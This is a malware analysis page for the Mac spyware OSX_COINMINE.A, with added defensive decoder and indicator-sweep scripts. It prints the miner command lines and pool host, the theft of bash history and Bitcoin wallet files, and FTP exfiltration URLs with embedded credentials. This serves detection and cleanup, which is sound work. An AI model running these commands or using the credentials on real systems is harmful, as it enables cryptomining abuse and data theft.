OSX_COINMINE.A

 Analysis by: Christopher Daniel So

 ALIASES:

Backdoor:MacOS_X/DevilRobber.A (Microsoft)

 PLATFORM:

Mac OS X

 OVERALL RISK RATING:
 REPORTED INFECTION:
 SYSTEM IMPACT RATING:
 INFORMATION EXPOSURE:

  • Threat Type: Spyware

  • Destructiveness: No

  • Encrypted: Yes

  • In the wild: Yes

  OVERVIEW

This spyware runs a Bitcoin miner daemon (minerd) against a mining pool, and also executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing it the pool and payout parameters listed in the Technical Details below. It writes a text file, dump.txt, containing information harvested from the affected system, zips it to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip with the zip command, and uploads the archive to FTP servers using hard-coded credentials.

This Spyware may arrive bundled with malware packages as a malware component. It may be downloaded by other malware/grayware from remote sites.

It executes commands from a remote malicious user, effectively compromising the affected system.

  TECHNICAL DETAILS

File Size:

Varies

File Type:

Mach-O, Script

Memory Resident:

Yes

Initial Samples Received Date:

02 Nov 2011

Payload:

Creates files

Arrival Details

This Spyware may arrive bundled with malware packages as a malware component.

It may be downloaded by the following malware/grayware from remote sites:

  • TROJ_COINMINE.A

Backdoor Routine

This Spyware opens the following port(s) where it listens for remote commands:

  • TCP port 34123

It executes the following commands from a remote malicious user:

  • 1 - execute a command and return the result to the remote client
  • 2 - take a screenshot by running the command screencapture -T 0 -x 1.png, uuencode the file 1.png to s.txt, send s.txt to the remote client, and delete 1.png and s.txt after sending
  • any other command - close the connection
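The "2" command ships the screenshot as uuencoded text over the same TCP 34123 connection. The following is an added example, not code from the original write-up or from Trend Micro: a small decoder that turns a uuencoded capture of s.txt back into the PNG, so a responder who recorded the backdoor session can recover what was sent out. The sample below is constructed by hand (the uuencoding of a file holding only the 8-byte PNG signature), not captured traffic; the file name and mode in its begin line are what the page says the backdoor uses.

```python
"""Recover the screenshot the backdoor sends as uuencoded text.

Added example, not code from the original page. binascii.a2b_uu decodes
one uuencoded line at a time, so the decoder walks the lines itself
rather than relying on the uu module (removed in Python 3.13).
"""
import binascii
import re
from typing import Tuple

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Constructed sample, not captured traffic: the uuencoding of a 1.png that
# holds only the 8-byte PNG signature. Line 2 is the single data line
# (length char '(' = 8 bytes), line 3 is the empty terminating line.
SAMPLE = (
    "begin 644 1.png\n"
    "(B5!.1PT*&@H`\n"
    "`\n"
    "end\n"
)

_BEGIN = re.compile(r"^begin\s+([0-7]{3,4})\s+(.+?)\s*$")


def uudecode(text: str) -> Tuple[str, int, bytes]:
    """Parse a uuencoded document; return (file name, mode, raw bytes).

    Raises ValueError on a missing or malformed header/trailer, which is
    what you get when the capture is truncated.
    """
    lines = text.splitlines()
    try:
        start = next(i for i, ln in enumerate(lines) if ln.startswith("begin "))
    except StopIteration:
        raise ValueError("no 'begin' header in input")
    m = _BEGIN.match(lines[start])
    if not m:
        raise ValueError("malformed 'begin' header")
    mode, name = int(m.group(1), 8), m.group(2)
    out = bytearray()
    for line in lines[start + 1:]:
        if line.strip() == "end":
            return name, mode, bytes(out)
        if not line:
            continue
        # Each line carries up to 45 bytes; the length is its first character.
        out += binascii.a2b_uu(line)
    raise ValueError("missing 'end' trailer (truncated capture?)")


def is_png(data: bytes) -> bool:
    """True if the recovered bytes start with the PNG signature."""
    return data.startswith(PNG_MAGIC)


if __name__ == "__main__":
    fname, fmode, blob = uudecode(SAMPLE)
    print(f"{fname} (mode {fmode:o}), {len(blob)} bytes, png={is_png(blob)}")
```

On a real capture, feed the text between the backdoor's reply start and the connection close; a result that is not a PNG usually means the stream was cut mid-line.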

NOTES:

It executes a Bitcoin miner daemon by running the following command:

  • ./minerd --url http://su.mining.eligius.st:8337 --userpass {Bitcoin host user name}:123 --algo cryptopp_asm32

It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing the following command-line parameters:

  • -u {Bitcoin host user name} -p 123 -o su.mining.eligius.st -r 8337 -v 2 -f 20

{Bitcoin host user name}, which the pool uses as the worker name, can be any of the following Bitcoin addresses:

  • 16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX
  • 15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1
  • 1FNnnNMDoPQA2PwHJaK3cZZSTcWq42GRTh

It creates a text file dump.txt that contains the following information:

  • Number of files whose file name contains truecrypt
  • Number of files whose file name contains pthc
  • Number of files whose file name contains vidalia
  • The entire contents of the file /Users/{user name}/.bash_history
  • The entire contents of the file /Users/{user name}/Library/Application Support/Bitcoin/wallet.dat, if it exists

It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running the following command:

  • zip -r -X {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip dump.txt

It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to the following FTP servers, with the account credentials embedded in clear text in the URL:

  • ftp://bubba47:semiram237@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
  • ftp://acab73:boss583@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
  • ftp://manamar489:most832@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip

It drops the file status.cfg which contains its current configuration.
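An offline sweep for the indicators above, as an added example (not part of the original description and not Trend Micro tooling): it matches the backdoor port, the miner command lines, the pool and drop hosts, the payout addresses, the dropped files and the exfil archive name against host output of the kind `lsof -nP -iTCP -sTCP:LISTEN`, `ps -axo pid,command` and `find` produce. The three inputs are constructed samples; the `java -jar DiabloMiner.jar` form of the second miner's command line is an assumption, since the page only lists its parameters.

```python
"""Offline IOC sweep for the indicators in this description.

Added example, not part of the original page and not Trend Micro code.
The inputs are constructed samples of macOS host output, not real data.
"""
import re
from typing import List, NamedTuple

LISTEN_PORT = 34123                      # backdoor port from the page
POOL_HOST = "su.mining.eligius.st"       # mining pool used by both miners
DROP_HOST = "ftp.drivehq.com"            # FTP host the archive goes to
MINER_BINARIES = ("minerd", "DiabloMiner.jar")
WALLET_ADDRESSES = (
    "16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX",
    "15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1",
    "1FNnnNMDoPQA2PwHJaK3cZZSTcWq42GRTh",
)
DROPPED_FILES = ("dump.txt", "status.cfg")
# {hex}_{hex}_{hex}.zip: loose on purpose, so treat a hit as a lead, not proof.
ZIP_NAME = re.compile(r"^[0-9a-fA-F]+_[0-9a-fA-F]+_[0-9a-fA-F]+\.zip$")
LISTENER = re.compile(r"TCP\s+\S+:(\d+)\s+\(LISTEN\)")
PROCESS_TERMS = MINER_BINARIES + (POOL_HOST, DROP_HOST) + WALLET_ADDRESSES


class Finding(NamedTuple):
    kind: str      # "listener", "process", "file" or "exposure"
    detail: str


def scan_listeners(lsof_text: str) -> List[Finding]:
    """Flag any process that listens on the backdoor port."""
    out = []
    for line in lsof_text.splitlines():
        m = LISTENER.search(line)
        if m and int(m.group(1)) == LISTEN_PORT:
            out.append(Finding("listener", f"{line.split()[0]} listens on TCP {LISTEN_PORT}"))
    return out


def scan_processes(ps_text: str) -> List[Finding]:
    """Flag miner binaries, the pool/drop hosts and the payout addresses."""
    out = []
    for line in ps_text.splitlines():
        fields = line.split()
        if not fields or fields[0] == "PID":       # skip blank and header lines
            continue
        hits = [t for t in PROCESS_TERMS if t in line]
        if hits:
            out.append(Finding("process", f"pid {fields[0]}: {', '.join(hits)}"))
    return out


def scan_files(paths: List[str]) -> List[Finding]:
    """Flag dropped files and the exfil archive; note the wallet it copies."""
    out = []
    for p in paths:
        name = p.rsplit("/", 1)[-1]
        if name in DROPPED_FILES or ZIP_NAME.match(name):
            out.append(Finding("file", p))
        elif p.endswith("/Library/Application Support/Bitcoin/wallet.dat"):
            out.append(Finding("exposure", p + " (copied into dump.txt if present)"))
    return out


# Constructed samples (not real host output).
LSOF_SAMPLE = """\
COMMAND  PID  USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
launchd    1  root  10u  IPv6    0x1      0t0  TCP *:22 (LISTEN)
bin      512 alice   3u  IPv4    0x2      0t0  TCP *:34123 (LISTEN)
"""
PS_SAMPLE = """\
  PID COMMAND
  512 ./minerd --url http://su.mining.eligius.st:8337 --userpass 16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX:123 --algo cryptopp_asm32
  513 java -jar DiabloMiner.jar -u 15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1 -p 123 -o su.mining.eligius.st -r 8337 -v 2 -f 20
  600 /Applications/Safari.app/Contents/MacOS/Safari
"""
FILE_SAMPLE = [
    "/Users/alice/.bash_history",
    "/Users/alice/Library/Application Support/Bitcoin/wallet.dat",
    "/private/tmp/dump.txt",
    "/private/tmp/status.cfg",
    "/private/tmp/3fa1_9c0b_77e2.zip",
    "/private/tmp/report.zip",
]


def sweep(lsof_text: str = LSOF_SAMPLE, ps_text: str = PS_SAMPLE,
          paths: List[str] = FILE_SAMPLE) -> List[Finding]:
    """Run all three checks and return the findings in collection order."""
    return scan_listeners(lsof_text) + scan_processes(ps_text) + scan_files(paths)


if __name__ == "__main__":
    for f in sweep():
        print(f"[{f.kind}] {f.detail}")
```

Run it against real output by piping `lsof`, `ps` and `find ~ -type f` into the three functions; the "exposure" finding is not evidence of infection, it only marks the wallet the spyware would copy if it is present.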

  SOLUTION

Minimum Scan Engine:

9.200

FIRST VSAPI PATTERN FILE:

8.560.05

FIRST VSAPI PATTERN DATE:

09 Nov 2011

VSAPI OPR PATTERN File:

8.561.00

VSAPI OPR PATTERN Date:

10 Nov 2011

Step 1

Remove the malware/grayware file that dropped/downloaded OSX_COINMINE.A, listed under Arrival Details above as TROJ_COINMINE.A. (Note: Please skip this step if that threat has already been removed.)

Step 2

Remove the malware/grayware file dropped/downloaded by OSX_COINMINE.A, that is, the bundled DiabloMiner.jar detected as JAVA_COINMINE.A. (Note: Please skip this step if that threat has already been removed.)

Step 3

Restart in normal mode and scan your computer with your Trend Micro product for files detected as OSX_COINMINE.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Because this threat is memory resident, confirm after the scan that no process is still listening on TCP port 34123 and that no minerd process remains running.
